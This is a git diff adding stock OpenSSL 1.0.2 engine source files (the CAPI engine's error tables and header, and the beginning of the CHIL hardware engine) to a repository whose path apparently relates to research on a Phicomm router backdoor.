+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA CAPI_str_functs[] = {
+    {ERR_FUNC(CAPI_F_CAPI_CERT_GET_FNAME), "CAPI_CERT_GET_FNAME"},
+    {ERR_FUNC(CAPI_F_CAPI_CTRL), "CAPI_CTRL"},
+    {ERR_FUNC(CAPI_F_CAPI_CTX_NEW), "CAPI_CTX_NEW"},
+    {ERR_FUNC(CAPI_F_CAPI_CTX_SET_PROVNAME), "CAPI_CTX_SET_PROVNAME"},
+    {ERR_FUNC(CAPI_F_CAPI_DSA_DO_SIGN), "CAPI_DSA_DO_SIGN"},
+    {ERR_FUNC(CAPI_F_CAPI_GET_KEY), "CAPI_GET_KEY"},
+    {ERR_FUNC(CAPI_F_CAPI_GET_PKEY), "CAPI_GET_PKEY"},
+    {ERR_FUNC(CAPI_F_CAPI_GET_PROVNAME), "CAPI_GET_PROVNAME"},
+    {ERR_FUNC(CAPI_F_CAPI_GET_PROV_INFO), "CAPI_GET_PROV_INFO"},
+    {ERR_FUNC(CAPI_F_CAPI_INIT), "CAPI_INIT"},
+    {ERR_FUNC(CAPI_F_CAPI_LIST_CONTAINERS), "CAPI_LIST_CONTAINERS"},
+    {ERR_FUNC(CAPI_F_CAPI_LOAD_PRIVKEY), "CAPI_LOAD_PRIVKEY"},
+    {ERR_FUNC(CAPI_F_CAPI_OPEN_STORE), "CAPI_OPEN_STORE"},
+    {ERR_FUNC(CAPI_F_CAPI_RSA_PRIV_DEC), "CAPI_RSA_PRIV_DEC"},
+    {ERR_FUNC(CAPI_F_CAPI_RSA_PRIV_ENC), "CAPI_RSA_PRIV_ENC"},
+    {ERR_FUNC(CAPI_F_CAPI_RSA_SIGN), "CAPI_RSA_SIGN"},
+    {ERR_FUNC(CAPI_F_CERT_SELECT_DIALOG), "CERT_SELECT_DIALOG"},
+    {ERR_FUNC(CAPI_F_CLIENT_CERT_SELECT), "CLIENT_CERT_SELECT"},
+    {ERR_FUNC(CAPI_F_WIDE_TO_ASC), "WIDE_TO_ASC"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CAPI_str_reasons[] = {
+    {ERR_REASON(CAPI_R_CANT_CREATE_HASH_OBJECT), "cant create hash object"},
+    {ERR_REASON(CAPI_R_CANT_FIND_CAPI_CONTEXT), "cant find capi context"},
+    {ERR_REASON(CAPI_R_CANT_GET_KEY), "cant get key"},
+    {ERR_REASON(CAPI_R_CANT_SET_HASH_VALUE), "cant set hash value"},
+    {ERR_REASON(CAPI_R_CRYPTACQUIRECONTEXT_ERROR),
+     "cryptacquirecontext error"},
+    {ERR_REASON(CAPI_R_CRYPTENUMPROVIDERS_ERROR), "cryptenumproviders error"},
+    {ERR_REASON(CAPI_R_DECRYPT_ERROR), "decrypt error"},
+    {ERR_REASON(CAPI_R_ENGINE_NOT_INITIALIZED), "engine not initialized"},
+    {ERR_REASON(CAPI_R_ENUMCONTAINERS_ERROR), "enumcontainers error"},
+    {ERR_REASON(CAPI_R_ERROR_ADDING_CERT), "error adding cert"},
+    {ERR_REASON(CAPI_R_ERROR_CREATING_STORE), "error creating store"},
+    {ERR_REASON(CAPI_R_ERROR_GETTING_FRIENDLY_NAME),
+     "error getting friendly name"},
+    {ERR_REASON(CAPI_R_ERROR_GETTING_KEY_PROVIDER_INFO),
+     "error getting key provider info"},
+    {ERR_REASON(CAPI_R_ERROR_OPENING_STORE), "error opening store"},
+    {ERR_REASON(CAPI_R_ERROR_SIGNING_HASH), "error signing hash"},
+    {ERR_REASON(CAPI_R_FUNCTION_NOT_SUPPORTED), "function not supported"},
+    {ERR_REASON(CAPI_R_GETUSERKEY_ERROR), "getuserkey error"},
+    {ERR_REASON(CAPI_R_INVALID_DIGEST_LENGTH), "invalid digest length"},
+    {ERR_REASON(CAPI_R_INVALID_DSA_PUBLIC_KEY_BLOB_MAGIC_NUMBER),
+     "invalid dsa public key blob magic number"},
+    {ERR_REASON(CAPI_R_INVALID_LOOKUP_METHOD), "invalid lookup method"},
+    {ERR_REASON(CAPI_R_INVALID_PUBLIC_KEY_BLOB), "invalid public key blob"},
+    {ERR_REASON(CAPI_R_INVALID_RSA_PUBLIC_KEY_BLOB_MAGIC_NUMBER),
+     "invalid rsa public key blob magic number"},
+    {ERR_REASON(CAPI_R_PUBKEY_EXPORT_ERROR), "pubkey export error"},
+    {ERR_REASON(CAPI_R_PUBKEY_EXPORT_LENGTH_ERROR),
+     "pubkey export length error"},
+    {ERR_REASON(CAPI_R_UNKNOWN_COMMAND), "unknown command"},
+    {ERR_REASON(CAPI_R_UNSUPPORTED_ALGORITHM_NID),
+     "unsupported algorithm nid"},
+    {ERR_REASON(CAPI_R_UNSUPPORTED_PADDING), "unsupported padding"},
+    {ERR_REASON(CAPI_R_UNSUPPORTED_PUBLIC_KEY_ALGORITHM),
+     "unsupported public key algorithm"},
+    {ERR_REASON(CAPI_R_WIN32_ERROR), "win32 error"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef CAPI_LIB_NAME
+static ERR_STRING_DATA CAPI_lib_name[] = {
+    {0, CAPI_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int CAPI_lib_error_code = 0;
+static int CAPI_error_init = 1;
+
+static void ERR_load_CAPI_strings(void)
+{
+    if (CAPI_lib_error_code == 0)
+        CAPI_lib_error_code = ERR_get_next_error_library();
+
+    if (CAPI_error_init) {
+        CAPI_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(CAPI_lib_error_code, CAPI_str_functs);
+        ERR_load_strings(CAPI_lib_error_code, CAPI_str_reasons);
+#endif
+
+#ifdef CAPI_LIB_NAME
+        CAPI_lib_name->error = ERR_PACK(CAPI_lib_error_code, 0, 0);
+        ERR_load_strings(0, CAPI_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_CAPI_strings(void)
+{
+    if (CAPI_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(CAPI_lib_error_code, CAPI_str_functs);
+        ERR_unload_strings(CAPI_lib_error_code, CAPI_str_reasons);
+#endif
+
+#ifdef CAPI_LIB_NAME
+        ERR_unload_strings(0, CAPI_lib_name);
+#endif
+        CAPI_error_init = 1;
+    }
+}
+
+static void ERR_CAPI_error(int function, int reason, char *file, int line)
+{
+    if (CAPI_lib_error_code == 0)
+        CAPI_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(CAPI_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi_err.h
new file mode 100644
index 0000000..b5d06dc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi_err.h
@@ -0,0 +1,129 @@
+/* ====================================================================
+ * Copyright (c) 2001-2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_CAPI_ERR_H
+# define HEADER_CAPI_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_CAPI_strings(void);
+static void ERR_unload_CAPI_strings(void);
+static void ERR_CAPI_error(int function, int reason, char *file, int line);
+# define CAPIerr(f,r) ERR_CAPI_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the CAPI functions. */
+
+/* Function codes. */
+# define CAPI_F_CAPI_CERT_GET_FNAME                       99
+# define CAPI_F_CAPI_CTRL                                 100
+# define CAPI_F_CAPI_CTX_NEW                              101
+# define CAPI_F_CAPI_CTX_SET_PROVNAME                     102
+# define CAPI_F_CAPI_DSA_DO_SIGN                          114
+# define CAPI_F_CAPI_GET_KEY                              103
+# define CAPI_F_CAPI_GET_PKEY                             115
+# define CAPI_F_CAPI_GET_PROVNAME                         104
+# define CAPI_F_CAPI_GET_PROV_INFO                        105
+# define CAPI_F_CAPI_INIT                                 106
+# define CAPI_F_CAPI_LIST_CONTAINERS                      107
+# define CAPI_F_CAPI_LOAD_PRIVKEY                         108
+# define CAPI_F_CAPI_OPEN_STORE                           109
+# define CAPI_F_CAPI_RSA_PRIV_DEC                         110
+# define CAPI_F_CAPI_RSA_PRIV_ENC                         111
+# define CAPI_F_CAPI_RSA_SIGN                             112
+# define CAPI_F_CERT_SELECT_DIALOG                        117
+# define CAPI_F_CLIENT_CERT_SELECT                        116
+# define CAPI_F_WIDE_TO_ASC                               113
+
+/* Reason codes. */
+# define CAPI_R_CANT_CREATE_HASH_OBJECT                   99
+# define CAPI_R_CANT_FIND_CAPI_CONTEXT                    100
+# define CAPI_R_CANT_GET_KEY                              101
+# define CAPI_R_CANT_SET_HASH_VALUE                       102
+# define CAPI_R_CRYPTACQUIRECONTEXT_ERROR                 103
+# define CAPI_R_CRYPTENUMPROVIDERS_ERROR                  104
+# define CAPI_R_DECRYPT_ERROR                             105
+# define CAPI_R_ENGINE_NOT_INITIALIZED                    106
+# define CAPI_R_ENUMCONTAINERS_ERROR                      107
+# define CAPI_R_ERROR_ADDING_CERT                         125
+# define CAPI_R_ERROR_CREATING_STORE                      126
+# define CAPI_R_ERROR_GETTING_FRIENDLY_NAME               108
+# define CAPI_R_ERROR_GETTING_KEY_PROVIDER_INFO           109
+# define CAPI_R_ERROR_OPENING_STORE                       110
+# define CAPI_R_ERROR_SIGNING_HASH                        111
+# define CAPI_R_FUNCTION_NOT_SUPPORTED                    112
+# define CAPI_R_GETUSERKEY_ERROR                          113
+# define CAPI_R_INVALID_DIGEST_LENGTH                     124
+# define CAPI_R_INVALID_DSA_PUBLIC_KEY_BLOB_MAGIC_NUMBER  122
+# define CAPI_R_INVALID_LOOKUP_METHOD                     114
+# define CAPI_R_INVALID_PUBLIC_KEY_BLOB                   115
+# define CAPI_R_INVALID_RSA_PUBLIC_KEY_BLOB_MAGIC_NUMBER  123
+# define CAPI_R_PUBKEY_EXPORT_ERROR                       116
+# define CAPI_R_PUBKEY_EXPORT_LENGTH_ERROR                117
+# define CAPI_R_UNKNOWN_COMMAND                           118
+# define CAPI_R_UNSUPPORTED_ALGORITHM_NID                 119
+# define CAPI_R_UNSUPPORTED_PADDING                       120
+# define CAPI_R_UNSUPPORTED_PUBLIC_KEY_ALGORITHM          121
+# define CAPI_R_WIN32_ERROR                               127
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil.c
new file mode 100644
index 0000000..69d49d7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_chil.c
@@ -0,0 +1,1339 @@
+/* crypto/engine/e_chil.c -*- mode: C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org), Geoff Thorpe
+ * (geoff@geoffthorpe.net) and Dr Stephen N Henson (steve@openssl.org) for
+ * the OpenSSL project 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/pem.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#include <openssl/ui.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_CHIL
+
+/*-
+ * Attribution notice: nCipher have said several times that it's OK for
+ * us to implement a general interface to their boxes, and recently declared
+ * their HWCryptoHook to be public, and therefore available for us to use.
+ * Thanks, nCipher.
+ *
+ * The hwcryptohook.h included here is from May 2000.
+ * [Richard Levitte]
+ */
+#  ifdef FLAT_INC
+#   include "hwcryptohook.h"
+#  else
+#   include "vendor_defns/hwcryptohook.h"
+#  endif
+
+#  define HWCRHK_LIB_NAME "CHIL engine"
+#  include "e_chil_err.c"
+
+static int hwcrhk_destroy(ENGINE *e);
+static int hwcrhk_init(ENGINE *e);
+static int hwcrhk_finish(ENGINE *e);
+static int hwcrhk_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+
+/* Functions to handle mutexes */
+static int hwcrhk_mutex_init(HWCryptoHook_Mutex *,
+                             HWCryptoHook_CallerContext *);
+static int hwcrhk_mutex_lock(HWCryptoHook_Mutex *);
+static void hwcrhk_mutex_unlock(HWCryptoHook_Mutex *);
+static void hwcrhk_mutex_destroy(HWCryptoHook_Mutex *);
+
+/* BIGNUM stuff */
+static int hwcrhk_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                          const BIGNUM *m, BN_CTX *ctx);
+
+#  ifndef OPENSSL_NO_RSA
+/* RSA stuff */
+static int hwcrhk_rsa_mod_exp(BIGNUM *r, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx);
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int hwcrhk_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                               const BIGNUM *m, BN_CTX *ctx,
+                               BN_MONT_CTX *m_ctx);
+static int hwcrhk_rsa_finish(RSA *rsa);
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* DH stuff */
+/* This function is alised to mod_exp (with the DH and mont dropped). */
+static int hwcrhk_mod_exp_dh(const DH *dh, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx);
+#  endif
+
+/* RAND stuff */
+static int hwcrhk_rand_bytes(unsigned char *buf, int num);
+static int hwcrhk_rand_status(void);
+
+/* KM stuff */
+static EVP_PKEY *hwcrhk_load_privkey(ENGINE *eng, const char *key_id,
+                                     UI_METHOD *ui_method,
+                                     void *callback_data);
+static EVP_PKEY *hwcrhk_load_pubkey(ENGINE *eng, const char *key_id,
+                                    UI_METHOD *ui_method,
+                                    void *callback_data);
+
+/* Interaction stuff */
+static int hwcrhk_insert_card(const char *prompt_info,
+                              const char *wrong_info,
+                              HWCryptoHook_PassphraseContext * ppctx,
+                              HWCryptoHook_CallerContext * cactx);
+static int hwcrhk_get_pass(const char *prompt_info,
+                           int *len_io, char *buf,
+                           HWCryptoHook_PassphraseContext * ppctx,
+                           HWCryptoHook_CallerContext * cactx);
+static void hwcrhk_log_message(void *logstr, const char *message);
+
+/* The definitions for control commands specific to this engine */
+#  define HWCRHK_CMD_SO_PATH              ENGINE_CMD_BASE
+#  define HWCRHK_CMD_FORK_CHECK           (ENGINE_CMD_BASE + 1)
+#  define HWCRHK_CMD_THREAD_LOCKING       (ENGINE_CMD_BASE + 2)
+#  define HWCRHK_CMD_SET_USER_INTERFACE   (ENGINE_CMD_BASE + 3)
+#  define HWCRHK_CMD_SET_CALLBACK_DATA    (ENGINE_CMD_BASE + 4)
+static const ENGINE_CMD_DEFN hwcrhk_cmd_defns[] = {
+    {HWCRHK_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'hwcrhk' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {HWCRHK_CMD_FORK_CHECK,
+     "FORK_CHECK",
+     "Turns fork() checking on (non-zero) or off (zero)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {HWCRHK_CMD_THREAD_LOCKING,
+     "THREAD_LOCKING",
+     "Turns thread-safe locking on (zero) or off (non-zero)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {HWCRHK_CMD_SET_USER_INTERFACE,
+     "SET_USER_INTERFACE",
+     "Set the global user interface (internal)",
+     ENGINE_CMD_FLAG_INTERNAL},
+    {HWCRHK_CMD_SET_CALLBACK_DATA,
+     "SET_CALLBACK_DATA",
+     "Set the global user interface extra data (internal)",
+     ENGINE_CMD_FLAG_INTERNAL},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD hwcrhk_rsa = {
+    "CHIL RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    hwcrhk_rsa_mod_exp,
+    hwcrhk_mod_exp_mont,
+    NULL,
+    hwcrhk_rsa_finish,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+static DH_METHOD hwcrhk_dh = {
+    "CHIL DH method",
+    NULL,
+    NULL,
+    hwcrhk_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL
+};
+#  endif
+
+static RAND_METHOD hwcrhk_rand = {
+    /* "CHIL RAND method", */
+    NULL,
+    hwcrhk_rand_bytes,
+    NULL,
+    NULL,
+    hwcrhk_rand_bytes,
+    hwcrhk_rand_status,
+};
+
+/* Constants used when creating the ENGINE */
+static const char *engine_hwcrhk_id = "chil";
+static const char *engine_hwcrhk_name = "CHIL hardware engine support";
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+/* Compatibility hack, the dynamic library uses this form in the path */
+static const char *engine_hwcrhk_id_alt = "ncipher";
+#  endif
+
+/* Internal stuff for HWCryptoHook */
+
+/* Some structures needed for proper use of thread locks */
+/*
+ * hwcryptohook.h has some typedefs that turn struct HWCryptoHook_MutexValue
+ * into HWCryptoHook_Mutex
+ */
+struct HWCryptoHook_MutexValue {
+    int lockid;
+};
+
+/*
+ * hwcryptohook.h has some typedefs that turn struct
+ * HWCryptoHook_PassphraseContextValue into HWCryptoHook_PassphraseContext
+ */
+struct HWCryptoHook_PassphraseContextValue {
+    UI_METHOD *ui_method;
+    void *callback_data;
+};
+
+/*
+ * hwcryptohook.h has some typedefs that turn struct
+ * HWCryptoHook_CallerContextValue into HWCryptoHook_CallerContext
+ */
+struct HWCryptoHook_CallerContextValue {
+    pem_password_cb *password_callback; /* Deprecated! Only present for
+                                         * backward compatibility! */
+    UI_METHOD *ui_method;
+    void *callback_data;
+};
+
+/*
+ * The MPI structure in HWCryptoHook is pretty compatible with OpenSSL
+ * BIGNUM's, so lets define a couple of conversion macros
+ */
+#  define BN2MPI(mp, bn) \
+    {mp.size = bn->top * sizeof(BN_ULONG); mp.buf = (unsigned char *)bn->d;}
+#  define MPI2BN(bn, mp) \
+    {mp.size = bn->dmax * sizeof(BN_ULONG); mp.buf = (unsigned char *)bn->d;}
+
+static BIO *logstream = NULL;
+static int disable_mutex_callbacks = 0;
+
+/*
+ * One might wonder why these are needed, since one can pass down at least a
+ * UI_METHOD and a pointer to callback data to the key-loading functions. The
+ * thing is that the ModExp and RSAImmed functions can load keys as well, if
+ * the data they get is in a special, nCipher-defined format (hint: if you
+ * look at the private exponent of the RSA data as a string, you'll see this
+ * string: "nCipher KM tool key id", followed by some bytes, followed a key
+ * identity string, followed by more bytes.  This happens when you use
+ * "embed" keys instead of "hwcrhk" keys).  Unfortunately, those functions do
+ * not take any passphrase or caller context, and our functions can't really
+ * take any callback data either.  Still, the "insert_card" and
+ * "get_passphrase" callbacks may be called down the line, and will need to
+ * know what user interface callbacks to call, and having callback data from
+ * the application may be a nice thing as well, so we need to keep track of
+ * that globally.
+ */
+static HWCryptoHook_CallerContext password_context = { NULL, NULL, NULL };
+
+/* Stuff to pass to the HWCryptoHook library */
+static HWCryptoHook_InitInfo hwcrhk_globals = {
+    HWCryptoHook_InitFlags_SimpleForkCheck, /* Flags */
+    &logstream,                 /* logstream */
+    sizeof(BN_ULONG),           /* limbsize */
+    0,                          /* mslimb first: false for BNs */
+    -1,                         /* msbyte first: use native */
+    0,                          /* Max mutexes, 0 = no small limit */
+    0,                          /* Max simultaneous, 0 = default */
+
+    /*
+     * The next few are mutex stuff: we write wrapper functions around the OS
+     * mutex functions.  We initialise them to 0 here, and change that to
+     * actual function pointers in hwcrhk_init() if dynamic locks are
+     * supported (that is, if the application programmer has made sure of
+     * setting up callbacks bafore starting this engine) *and* if
+     * disable_mutex_callbacks hasn't been set by a call to
+     * ENGINE_ctrl(ENGINE_CTRL_CHIL_NO_LOCKING).
+     */
+    sizeof(HWCryptoHook_Mutex),
+    0,
+    0,
+    0,
+    0,
+
+    /*
+     * The next few are condvar stuff: we write wrapper functions round the
+     * OS functions.  Currently not implemented and not and absolute
+     * necessity even in threaded programs, therefore 0'ed.  Will hopefully
+     * be implemented some day, since it enhances the efficiency of
+     * HWCryptoHook.
+     */
+    0,                          /* sizeof(HWCryptoHook_CondVar), */
+    0,                          /* hwcrhk_cv_init, */
+    0,                          /* hwcrhk_cv_wait, */
+    0,                          /* hwcrhk_cv_signal, */
+    0,                          /* hwcrhk_cv_broadcast, */
+    0,                          /* hwcrhk_cv_destroy, */
+
+    hwcrhk_get_pass,            /* pass phrase */
+    hwcrhk_insert_card,         /* insert a card */
+    hwcrhk_log_message          /* Log message */
+};
+
+/* Now, to our own code */
+
+/*
+ * This internal function is used by ENGINE_chil() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth2;
+#  endif
+    if (!ENGINE_set_id(e, engine_hwcrhk_id) ||
+        !ENGINE_set_name(e, engine_hwcrhk_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &hwcrhk_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &hwcrhk_dh) ||
+#  endif
+        !ENGINE_set_RAND(e, &hwcrhk_rand) ||
+        !ENGINE_set_destroy_function(e, hwcrhk_destroy) ||
+        !ENGINE_set_init_function(e, hwcrhk_init) ||
+        !ENGINE_set_finish_function(e, hwcrhk_finish) ||
+        !ENGINE_set_ctrl_function(e, hwcrhk_ctrl) ||
+        !ENGINE_set_load_privkey_function(e, hwcrhk_load_privkey) ||
+        !ENGINE_set_load_pubkey_function(e, hwcrhk_load_pubkey) ||
+        !ENGINE_set_cmd_defns(e, hwcrhk_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * cswift-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    hwcrhk_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    hwcrhk_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    hwcrhk_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    hwcrhk_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth2 = DH_OpenSSL();
+    hwcrhk_dh.generate_key = meth2->generate_key;
+    hwcrhk_dh.compute_key = meth2->compute_key;
+#  endif
+
+    /* Ensure the hwcrhk error handling is set up */
+    ERR_load_HWCRHK_strings();
+    return 1;
+}
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_chil(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_chil(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_chil();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * HWCryptoHook library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+static DSO *hwcrhk_dso = NULL;
+static HWCryptoHook_ContextHandle hwcrhk_context = 0;
+#  ifndef OPENSSL_NO_RSA
+/* Index for KM handle.  Not really used yet. */
+static int hndidx_rsa = -1;
+#  endif
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+static HWCryptoHook_Init_t *p_hwcrhk_Init = NULL;
+static HWCryptoHook_Finish_t *p_hwcrhk_Finish = NULL;
+static HWCryptoHook_ModExp_t *p_hwcrhk_ModExp = NULL;
+#  ifndef OPENSSL_NO_RSA
+static HWCryptoHook_RSA_t *p_hwcrhk_RSA = NULL;
+#  endif
+static HWCryptoHook_RandomBytes_t *p_hwcrhk_RandomBytes = NULL;
